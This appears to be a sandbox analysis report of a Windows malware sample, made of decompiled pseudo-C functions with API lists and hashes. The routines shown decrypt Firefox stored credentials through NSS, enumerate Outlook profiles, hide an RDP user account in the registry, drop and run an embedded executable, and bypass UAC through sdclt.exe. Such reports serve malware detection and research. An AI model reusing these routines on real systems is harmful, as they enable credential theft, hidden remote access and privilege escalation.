                                      • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                      • API String ID: 410702425-850564384
                                      • Opcode ID: cac963d90d9d3469b0a2a21ef7c5131b9ad6b3508b2cca23c0242f79c562742f
                                      • Instruction ID: 366dd6eb6b575cd4c2019eacfb979316250e91ffdc72c0079be9a736aa65e9f5
                                      • Opcode Fuzzy Hash: cac963d90d9d3469b0a2a21ef7c5131b9ad6b3508b2cca23c0242f79c562742f
                                      • Instruction Fuzzy Hash: 0A913071A20A19EBCF08EFA0D89A9EDB775BF14342F104129E915A7191DB30AF6CCF54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 85%
                                      			E0025822F(void* __eflags, void* _a4) {
                                      				short _v544;
                                      				char _v696;
                                      				short _v704;
                                      				intOrPtr _v720;
                                      				struct _WNDCLASSW _v760;
                                      				void* _v784;
                                      				struct tagMSG _v788;
                                      				struct _SYSTEMTIME _v804;
                                      				void* _v808;
                                      				struct HINSTANCE__* _v812;
                                      				long _v820;
                                      				intOrPtr _t54;
                                      				intOrPtr _t57;
                                      				intOrPtr _t60;
                                      				intOrPtr _t62;
                                      				intOrPtr _t65;
                                      				intOrPtr _t68;
                                      				intOrPtr _t73;
                                      				struct HWND__* _t77;
                                      				int _t81;
                                      				intOrPtr _t102;
                                      				void* _t103;
                                      				intOrPtr _t107;
                                      				void* _t115;
                                      				void* _t121;
                                      				struct HINSTANCE__* _t122;
                                      				struct HWND__* _t123;
                                      				intOrPtr _t125;
                                      				signed int _t126;
                                      				signed int _t132;
                                      				intOrPtr _t135;
                                      				intOrPtr _t138;
                                      				void* _t146;
                                      				void* _t147;
                                      				long _t151;
                                      				void* _t156;
                                      				void* _t157;
                                      				signed int _t159;
                                      				signed int _t160;
                                      				void* _t162;
                                      				signed int _t163;
                                      				void* _t168;
                                      
                                      				_t122 = GetModuleHandleA(0);
                                      				_v804.wSecond = _t122;
                                      				_v788.hwnd = _v788.hwnd & 0;
                                      				_t126 = 0xa;
                                      				memset( &(_v760.hIcon), 0, _t126 << 2);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t54 =  *0x266690; // 0x0
                                      				_t151 = 0;
                                      				E00251052(_t54 + 0x210, 0, 0x800);
                                      				_t57 =  *0x266690; // 0x0
                                      				E00251052(_t57 + 0x10, 0, 0x208);
                                      				_t60 =  *0x266690; // 0x0
                                      				_t168 = (_t163 & 0xfffffff8) - 0x314 + 0x24;
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t60 + 0x10, _t147, _t157, _t121);
                                      				_t62 =  *0x266690; // 0x0
                                      				lstrcatW(_t62 + 0x10, L"\\Microsoft Vision\\");
                                      				_t65 =  *0x266690; // 0x0
                                      				CreateDirectoryW(_t65 + 0x10, 0);
                                      				_t68 =  *0x266690; // 0x0
                                      				_t171 =  *((intOrPtr*)(_t68 + 0xa14));
                                      				if( *((intOrPtr*)(_t68 + 0xa14)) != 0) {
                                      					E00251052( &_v544, 0, 0x208);
                                      					_t107 =  *0x266690; // 0x0
                                      					_t168 = _t168 + 0xc;
                                      					lstrcpyW( &_v544, _t107 + 0x10);
                                      					lstrcatW( &_v544, "*");
                                      					E00253412(_t168,  &_v544);
                                      					_t115 = E0025DEC5( &(_v760.lpszClassName), _t171, 0);
                                      					_t125 =  *0x266690; // 0x0
                                      					_t156 = _t115;
                                      					_t13 = _t125 + 0xa18; // 0xa18
                                      					E00251815(_t13, _t171);
                                      					_t162 = 0;
                                      					if( *((intOrPtr*)(_t156 + 8)) > 0) {
                                      						do {
                                      							_t168 = _t168 - 0x18;
                                      							E00251862(_t156, _t168, _t162);
                                      							_t15 = _t125 + 0xa18; // 0xa18
                                      							E00251716(_t15);
                                      							_t162 = _t162 + 1;
                                      						} while (_t162 <  *((intOrPtr*)(_t156 + 8)));
                                      					}
                                      					_t143 = _v720;
                                      					if(_v720 != 0) {
                                      						E00251A75(_t143, _t143);
                                      					}
                                      					_t122 = _v812;
                                      					_t151 = 0;
                                      				}
                                      				_t146 = 4;
                                      				_t159 = E002532D4( &_v812, _t146, 0);
                                      				E00253162(E00253297( &_v808, _t146, 0, L"ExplorerIdentifier"), 0, _t159);
                                      				E00255A2D(_v820);
                                      				_t73 =  *0x266690; // 0x0
                                      				_v820 = _t151;
                                      				if( *((intOrPtr*)(_t73 + 0xa14)) != _t151) {
                                      					GetLocalTime( &_v804);
                                      					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
                                      					_t135 =  *0x266690; // 0x0
                                      					_t168 = _t168 + 0x20;
                                      					_t33 = _t135 + 0x10; // 0x10
                                      					E00253297(E00253297(_t135 + 0xc, _t146, _t135 + 0xc, _t33), _t146, _t135 + 0xc,  &_v696);
                                      					_t102 =  *0x266690; // 0x0
                                      					_t103 = CreateFileW( *(_t102 + 0xc), 0x10000000, 1, _t151, 2, 0x80, _t151);
                                      					_t138 =  *0x266690; // 0x0
                                      					 *(_t138 + 4) = _t103;
                                      					CloseHandle(_t103);
                                      				}
                                      				_v760.lpszClassName = _v808;
                                      				_v760.lpfnWndProc = E00257CB3;
                                      				_v760.hInstance = _t122;
                                      				RegisterClassW( &_v760);
                                      				_t77 = CreateWindowExW(_t151, _v760.lpszClassName, _t151, _t151, _t151, _t151, _t151, _t151, 0xfffffffd, _t151, _t122, _a4);
                                      				_t132 = 7;
                                      				_t123 = _t77;
                                      				memset( &_v788, 0, _t132 << 2);
                                      				_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      				if(_t81 == 0) {
                                      					L12:
                                      					_t160 = _v788.wParam;
                                      				} else {
                                      					_t160 = _t159 | 0xffffffff;
                                      					while(_t81 != _t160) {
                                      						TranslateMessage( &_v788);
                                      						DispatchMessageA( &_v788);
                                      						_t81 = GetMessageA( &_v788, _t123, 0, 0);
                                      						if(_t81 != 0) {
                                      							continue;
                                      						} else {
                                      							goto L12;
                                      						}
                                      						goto L13;
                                      					}
                                      				}
                                      				L13:
                                      				E00255A2D(_v808);
                                      				return _t160;
                                      			}

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00258240
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 002582A3
                                      • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 002582BD
                                      • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 002582C9
                                      • lstrcpyW.KERNEL32(?,-00000010), ref: 00258307
                                      • lstrcatW.KERNEL32(?,00262928), ref: 0025831A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025DEC5: FindFirstFileW.KERNEL32(?,?), ref: 0025DEF2
                                      • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 002583CA
                                      • wsprintfW.USER32 ref: 00258401
                                      • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00258443
                                      • CloseHandle.KERNEL32(00000000), ref: 00258453
                                      • RegisterClassW.USER32 ref: 00258472
                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,?), ref: 0025848D
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 002584AE
                                      • TranslateMessage.USER32(?), ref: 002584C0
                                      • DispatchMessageA.USER32(?), ref: 002584CB
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 002584DB
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                      • API String ID: 2678186124-2372768292
                                      • Opcode ID: 7c5892018f3be5e874edf7f0b006b067f1d2a9e21c88660d8ae69132a7d7156f
                                      • Instruction ID: ab4405838359cf2033fae04ecd6b3ba45b407de0a2b5d4152c414f7e036b82bd
                                      • Opcode Fuzzy Hash: 7c5892018f3be5e874edf7f0b006b067f1d2a9e21c88660d8ae69132a7d7156f
                                      • Instruction Fuzzy Hash: A1719F72514300ABD714DB64EC4DFABB7ECFB88701F008919F958E7291DA74E928CBA5
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      C-Code - Quality: 85%
                                      			E00258D7E(intOrPtr __ecx, void* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				intOrPtr _v20;
                                      				short _v4116;
                                      				short _v8212;
                                      				short _v12308;
                                      				long _t68;
                                      				int _t74;
                                      				intOrPtr _t75;
                                      				void* _t76;
                                      				short* _t80;
                                      
                                      				_t76 = __edx;
                                      				_t75 = __ecx;
                                      				E00251130(0x3014, __ecx);
                                      				_v20 = _t75;
                                      				_t74 = 0;
                                      				E00251052( &_v4116, 0, 0x800);
                                      				E00251052( &_v8212, 0, 0x800);
                                      				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                      					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      					if(__eflags != 0) {
                                      						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                      						if(__eflags != 0) {
                                      							_t80 = L"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676";
                                      							__eflags = RegOpenKeyExW(0x80000001, _t80, 0, 0xf003f,  &_v8);
                                      							if(__eflags != 0) {
                                      								L15:
                                      								__eflags = 0;
                                      								return 0;
                                      							}
                                      							_push(_t80);
                                      							L8:
                                      							lstrcpyW( &_v4116, ??);
                                      							if(RegQueryInfoKeyW(_v8, _t74, _t74, _t74,  &_v16,  &_v12, _t74, _t74, _t74, _t74, _t74, _t74) != 0) {
                                      								goto L15;
                                      							}
                                      							if(_v16 <= _t74) {
                                      								L14:
                                      								return 1;
                                      							} else {
                                      								goto L10;
                                      							}
                                      							while(1) {
                                      								L10:
                                      								_v12 = 0x800;
                                      								if(RegEnumKeyExW(_v8, _t74,  &_v12308,  &_v12, 0, 0, 0, 0) != 0) {
                                      									goto L15;
                                      								}
                                      								RegCloseKey(_v8);
                                      								lstrcpyW( &_v8212,  &_v4116);
                                      								lstrcatW( &_v8212, "\\");
                                      								lstrcatW( &_v8212,  &_v12308);
                                      								_t68 = RegOpenKeyExW(0x80000001,  &_v8212, 0, 0xf003f,  &_v8);
                                      								_t90 = _t68;
                                      								if(_t68 != 0) {
                                      									goto L15;
                                      								}
                                      								_push(_t75);
                                      								_t75 = _v20;
                                      								E00258F40(_t75, _t76, _t90, _v8);
                                      								RegCloseKey(_v8);
                                      								if(RegOpenKeyExW(0x80000001,  &_v4116, 0, 0xf003f,  &_v8) != 0) {
                                      									goto L15;
                                      								}
                                      								_t74 = _t74 + 1;
                                      								if(_t74 < _v16) {
                                      									continue;
                                      								}
                                      								goto L14;
                                      							}
                                      							goto L15;
                                      						}
                                      						_push(L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676");
                                      						goto L8;
                                      					}
                                      					_push(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      					goto L8;
                                      				}
                                      				_push(L"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676");
                                      				goto L8;
                                      			}

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00258DD5
                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?), ref: 00258DF2
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 00258E45
                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00258E5B
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 00258E8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00258E9F
                                      • lstrcpyW.KERNEL32(?,?), ref: 00258EB3
                                      • lstrcatW.KERNEL32(?,00262644), ref: 00258EC1
                                      • lstrcatW.KERNEL32(?,?), ref: 00258ED5
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00258EF2
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00258F07
                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00258F24
                                      Strings
                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258E22, 00258E27, 00258E37
                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258E05, 00258E15
                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DCB
                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DDB
                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 00258DE8, 00258DF8
                                      Yara matches
                                      Similarity
                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                      • API String ID: 1891545080-2020977430
                                      • Opcode ID: d69b25524cfaa4e89aaf118b95a0e266b2a047a0f88e45901191398e71046f5a
                                      • Instruction ID: ace5e5ccd9b16e41dba988b91baae85bfb78a976d2191cb590215e00a10cc1ec
                                      • Opcode Fuzzy Hash: d69b25524cfaa4e89aaf118b95a0e266b2a047a0f88e45901191398e71046f5a
                                      • Instruction Fuzzy Hash: E84121B292011DFEEB10DAA1CC45EFB777CEB15385F1004A5B905F2041EAB49EA8DB74
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 85%
                                      			E00260E40(void* __ecx, void* __eflags, long _a4) {
                                      				intOrPtr* _v8;
                                      				long _v12;
                                      				struct _SHELLEXECUTEINFOA _v72;
                                      				char _v1096;
                                      				char _v2120;
                                      				char _v3144;
                                      				void* _t37;
                                      				void* _t39;
                                      				struct HRSRC__* _t80;
                                      				void* _t83;
                                      
                                      				_t75 =  *_a4;
                                      				_t67 = __ecx + 4;
                                      				_v8 = __ecx + 4;
                                      				E00253264(_t67, E0025FC1E( &_a4,  *_a4 + 4,  *_t75));
                                      				E00255A2D(_a4);
                                      				_t80 = FindResourceW(0, 0x67, L"WM_FIND");
                                      				_t37 = LoadResource(0, _t80);
                                      				_a4 = SizeofResource(0, _t80);
                                      				_t39 = LockResource(_t37);
                                      				E00251052( &_v1096, 0, 0x400);
                                      				E00251052( &_v2120, 0, 0x400);
                                      				GetTempPathA(0x400,  &_v1096);
                                      				lstrcatA( &_v1096, "find.exe");
                                      				GetTempPathA(0x400,  &_v2120);
                                      				lstrcatA( &_v2120, "find.db");
                                      				_t83 = CreateFileA( &_v1096, 0x10000000, 1, 0, 2, 0x84, 0);
                                      				WriteFile(_t83, _t39, _a4,  &_v12, 0);
                                      				CloseHandle(_t83);
                                      				E00251052( &_v3144, 0, 0x400);
                                      				wsprintfA( &_v3144, "-w %ws -d C -f %s",  *_v8,  &_v2120);
                                      				_v72.cbSize = 0x3c;
                                      				_v72.lpFile =  &_v1096;
                                      				_v72.fMask = 0x40;
                                      				asm("xorps xmm0, xmm0");
                                      				_v72.lpParameters =  &_v3144;
                                      				asm("movlpd [ebp-0x20], xmm0");
                                      				asm("movlpd [ebp-0x18], xmm0");
                                      				asm("movlpd [ebp-0x10], xmm0");
                                      				_v72.hwnd = 0;
                                      				_v72.lpVerb = 0;
                                      				_v72.lpDirectory = 0;
                                      				_v72.nShow = 0;
                                      				_v72.hInstApp = 0;
                                      				return ShellExecuteExA( &_v72);
                                      			}

                                      APIs
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • FindResourceW.KERNEL32(00000000,00000067,WM_FIND), ref: 00260E7F
                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00260E89
                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00260E93
                                      • LockResource.KERNEL32(00000000), ref: 00260E9D
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00260ED9
                                      • lstrcatA.KERNEL32(?,find.exe), ref: 00260EED
                                      • GetTempPathA.KERNEL32(00000400,?), ref: 00260EFB
                                      • lstrcatA.KERNEL32(?,find.db), ref: 00260F09
                                      • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000002,00000084,00000000), ref: 00260F24
                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00260F36
                                      • CloseHandle.KERNEL32(00000000), ref: 00260F3D
                                      • wsprintfA.USER32 ref: 00260F6D
                                      • ShellExecuteExA.SHELL32(0000003C), ref: 00260FBB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FilePathTemplstrcat$CloseCreateExecuteFindFreeHandleLoadLockShellSizeofVirtualWritelstrcpywsprintf
                                      • String ID: -w %ws -d C -f %s$<$@$WM_FIND$find.db$find.exe
                                      • API String ID: 2851928664-3107137372
                                      • Opcode ID: 76cef3aa66f7ad415dab0f50cde896e8b2481045ef9f4eca6a6297a0062c4867
                                      • Instruction ID: 6fd3c5cbbf65e6b3a514ab8bec61c848dd446035cbac8a8ca2e48489ff05e92b
                                      • Opcode Fuzzy Hash: 76cef3aa66f7ad415dab0f50cde896e8b2481045ef9f4eca6a6297a0062c4867
                                      • Instruction Fuzzy Hash: E3414DB1900218ABDB10DBA4DD89FDEBBBCFF45304F104196FA09A3151DAB05A558FA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025C67E(void* __edx, char _a4, char _a8) {
                                      				void* _v12;
                                      				char _v16;
                                      				int _v20;
                                      				char _v36;
                                      				void _v44;
                                      				void* _t51;
                                      				int _t56;
                                      				int _t70;
                                      				void* _t104;
                                      				signed int _t115;
                                      				void* _t161;
                                      				void* _t162;
                                      				void* _t163;
                                      				int _t172;
                                      
                                      				_t161 = __edx;
                                      				InitializeCriticalSection( &_v44);
                                      				_t115 = 6;
                                      				DeleteCriticalSection(memcpy(0x267cd8,  &_v44, _t115 << 2));
                                      				EnterCriticalSection(0x267cd8);
                                      				_t167 = _a4;
                                      				_t111 = _a8;
                                      				 *0x267d38 = _a4;
                                      				 *0x267d2c = 0x266cb8;
                                      				 *0x267d28 = _a8;
                                      				if(E0025C1A0(_t161) == 0) {
                                      					_t51 = E0025D4B8();
                                      					__eflags = _t51 - 6;
                                      					if(_t51 < 6) {
                                      						L14:
                                      						E00254B53(_t167, E002547F1( &_v36, 2, 0x267d30, 0x267d34));
                                      						E002547CE( &_v36);
                                      						LeaveCriticalSection(0x267cd8);
                                      						__eflags = 0;
                                      						return 0;
                                      					}
                                      					_t56 = E0025D469();
                                      					__eflags = _t56;
                                      					if(_t56 != 0) {
                                      						goto L14;
                                      					}
                                      					__eflags = E0025DB97() - 1;
                                      					if(__eflags == 0) {
                                      						_t162 = 8;
                                      						E00253264(0x267d30, E002532D4( &_a4, _t162, __eflags));
                                      						E00255A2D(_a4);
                                      						_t163 = 8;
                                      						E00253264(0x267d34, E002532D4( &_a4, _t163, __eflags));
                                      						E00255A2D(_a4);
                                      						_t172 = 0;
                                      						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
                                      						_v16 = 0;
                                      						RegSetValueExW(_v12,  *0x267d30, 0, 4,  &_v16, 4);
                                      						RegCloseKey(_v12);
                                      						_t70 = E0025B799(0x267d30, 0x267d34);
                                      						__eflags = _t70;
                                      						if(_t70 != 0) {
                                      							E0025F462(_a8, _t163, E00253412( &_a4, L"rudp"), 0x267d30);
                                      							E00255A2D(_a4);
                                      							E0025F462(_a8, _t163, E00253412( &_a8, L"rpdp"), 0x267d34);
                                      							E00255A2D(_a8);
                                      							E00251E6F(0x267cf0, E0025C57C, 0x267cd8);
                                      							LeaveCriticalSection(0x267cd8);
                                      							return 1;
                                      						}
                                      						E00254B53(_t167, E002547F1( &_v36, 9, 0x267d30, 0x267d34));
                                      						E002547CE( &_v36);
                                      						L12:
                                      						LeaveCriticalSection(0x267cd8);
                                      						return _t172;
                                      					}
                                      					E00254B53(_t167, E002547F1( &_v36, 1, 0x267d30, 0x267d34));
                                      					E002547CE( &_v36);
                                      					_t172 = 0;
                                      					goto L12;
                                      				}
                                      				E00253264(0x267d30, E0025F495(_t111, _t161,  &_a8, E00253412( &_a4, L"rudp")));
                                      				E00255A2D(_a8);
                                      				_a8 = 0;
                                      				E00255A2D(_a4);
                                      				E00253264(0x267d34, E0025F495(_t111, _t161,  &_a8, E00253412( &_a4, L"rpdp")));
                                      				E00255A2D(_a8);
                                      				_a8 = 0;
                                      				E00255A2D(_a4);
                                      				if(E0025308E(0x267d30) != 0 || E0025308E(0x267d34) != 0) {
                                      					E00254B53(_t167, E002547F1( &_v36, 8, 0x267d30, 0x267d34));
                                      					E002547CE( &_v36);
                                      				} else {
                                      					_t104 = E00253412( &_a4, 0x262608);
                                      					E00254B53(_t167, E002547F1( &_v36, 8, E00253412( &_a8, 0x262608), _t104));
                                      					E002547CE( &_v36);
                                      					E00255A2D(_a8);
                                      					_a8 = 0;
                                      					E00255A2D(_a4);
                                      				}
                                      				_t172 = 1;
                                      				goto L12;
                                      			}

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0025C68B
                                      • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0025C6A2
                                      • EnterCriticalSection.KERNEL32(00267CD8,?,?), ref: 0025C6AE
                                        • Part of subcall function 0025C1A0: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00267CD8,?,?,0025C6D5,?,?), ref: 0025C1D2
                                      • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0025C883
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0025C89E
                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 0025C8A7
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,00267D30,00267D34,?,?), ref: 0025C8E2
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025308E: lstrlenW.KERNEL32(?,00253473,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00253095
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,rpdp,00267D34,00000000,rudp,00267D30,00267D30,00267D34,?,?), ref: 0025C948
                                      • LeaveCriticalSection.KERNEL32(00267CD8,00000000,?,?), ref: 0025C978
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                      • String ID: 0}&$0}&$0}&$4}&$4}&$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                      • API String ID: 2046459734-3872354900
                                      • Opcode ID: 10b102356af43a51ab2846f450b2debc6e99261f5ec165b8b1529d1e30bb6d32
                                      • Instruction ID: cc20d33be39c360ccbe907b0e7831a51988c01af1a268ce3bf144917b5b85583
                                      • Opcode Fuzzy Hash: 10b102356af43a51ab2846f450b2debc6e99261f5ec165b8b1529d1e30bb6d32
                                      • Instruction Fuzzy Hash: 6A71E370630214ABCB00FB60DC96DBEB729AF19755F108424FD06A6192EF709E6DCF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 84%
                                      			E0025F8C0(void* __edx, void* __eflags) {
                                      				void* _v8;
                                      				char _v12;
                                      				struct _SHELLEXECUTEINFOW _v72;
                                      				short _v592;
                                      				char _v1616;
                                      				short* _t52;
                                      
                                      				if(E0025DB97() != 1) {
                                      					_v8 = 0;
                                      					__imp__IsWow64Process(GetCurrentProcess(),  &_v8);
                                      					if(_v8 != 0) {
                                      						_t46 =  &_v12;
                                      						E0025D5DB( &_v12);
                                      					}
                                      					E0025F6C1();
                                      					E00251052( &_v1616, 0, 0x400);
                                      					GetModuleFileNameA(0,  &_v1616, 0x400);
                                      					E0025F65C(_t46, 0x264713,  &_v1616);
                                      					E0025F65C(_t46, "DelegateExecute", 0x264713);
                                      					GetSystemDirectoryW( &_v592, 0x104);
                                      					lstrcatW( &_v592, L"\\sdclt.exe");
                                      					_t52 = L"open";
                                      					ShellExecuteW(0, _t52,  &_v592, 0, 0, 1);
                                      					asm("movaps xmm0, [0x2649b0]");
                                      					_v72.lpFile =  &_v592;
                                      					_v72.cbSize = 0x3c;
                                      					_v72.fMask = 0x40;
                                      					_v72.hwnd = 0;
                                      					_v72.lpVerb = _t52;
                                      					asm("movups [ebp-0x30], xmm0");
                                      					ShellExecuteExW( &_v72);
                                      					TerminateProcess(_v72.hProcess, 0);
                                      					if(_v8 != 0) {
                                      						E0025D5B4( &_v12);
                                      					}
                                      					Sleep(0x7d0);
                                      					RegDeleteKeyA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command");
                                      					ExitProcess(0);
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                        • Part of subcall function 0025DB97: GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0025DBA9
                                        • Part of subcall function 0025DB97: OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0025DBB0
